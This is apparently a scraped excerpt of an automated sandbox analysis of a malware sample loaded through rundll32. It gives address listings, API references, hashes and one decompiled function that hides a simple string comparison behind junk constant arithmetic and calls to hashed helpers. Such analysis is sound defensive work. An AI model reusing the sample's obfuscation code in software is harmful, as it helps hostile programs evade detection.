                                                                                                                      0x001c3cc7
                                                                                                                      0x001c3cce
                                                                                                                      0x001c3cdb
                                                                                                                      0x001c3ce2
                                                                                                                      0x001c3ce5
                                                                                                                      0x001c3cec
                                                                                                                      0x001c3cf3
                                                                                                                      0x001c3cfa
                                                                                                                      0x001c3cfe
                                                                                                                      0x001c3d01
                                                                                                                      0x001c3d08
                                                                                                                      0x001c3d19
                                                                                                                      0x001c3d1c
                                                                                                                      0x001c3d31
                                                                                                                      0x001c3d3b

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 001C3D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.524616955.00000000001B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.524808983.00000000001D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: 9e78f225bfae1d3bfc508dda359df71d3bfa44271057a411e49207b86c248e2d
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: 060104B6D0120CFFDB04DFE5D946A9DBBB0EB40304F508199E925AB290D7B85B54DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001CFC96 Relevance: 1.3, APIs: 1, Instructions: 41stringCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 297 1cfc96-1cfd28 call 1bcf25 call 1b2d9f lstrcmpiW
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E001CFC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t32;
				int _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001BCF25(_t32);
				_v8 = 0x178fa1;
				_v8 = _v8 | 0x2f4d5c19;
				_v8 = _v8 + 0xda24;
				_t42 = 0x35;
				_v8 = _v8 / _t42;
				_v8 = _v8 ^ 0x00e923af;
				_v16 = 0xca5f26;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x97c71065;
				_v12 = 0xeb54f5;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0000b8cd;
				E001B2D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
				_t40 = lstrcmpiW(_a12, _a4); // executed
				return _t40;
			}









                                                                                                                      0x001cfc9c
                                                                                                                      0x001cfc9f
                                                                                                                      0x001cfca2
                                                                                                                      0x001cfca7
                                                                                                                      0x001cfcac
                                                                                                                      0x001cfcb6
                                                                                                                      0x001cfcbf
                                                                                                                      0x001cfccb
                                                                                                                      0x001cfcd3
                                                                                                                      0x001cfcd6
                                                                                                                      0x001cfcdd
                                                                                                                      0x001cfce4
                                                                                                                      0x001cfce8
                                                                                                                      0x001cfcef
                                                                                                                      0x001cfcf6
                                                                                                                      0x001cfcfa
                                                                                                                      0x001cfd15
                                                                                                                      0x001cfd23
                                                                                                                      0x001cfd28

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(?,0000B8CD), ref: 001CFD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.524616955.00000000001B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.524808983.00000000001D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: 86d4dfa5d7d001d3aeb68339f50a8100663d2ad7278a4b4efcd12d34e0bfe9a4
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: 7701D376D00208BFDF05EFE4CD4A89EBBB6EB54304F10C098F9156A250DBB69B64DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%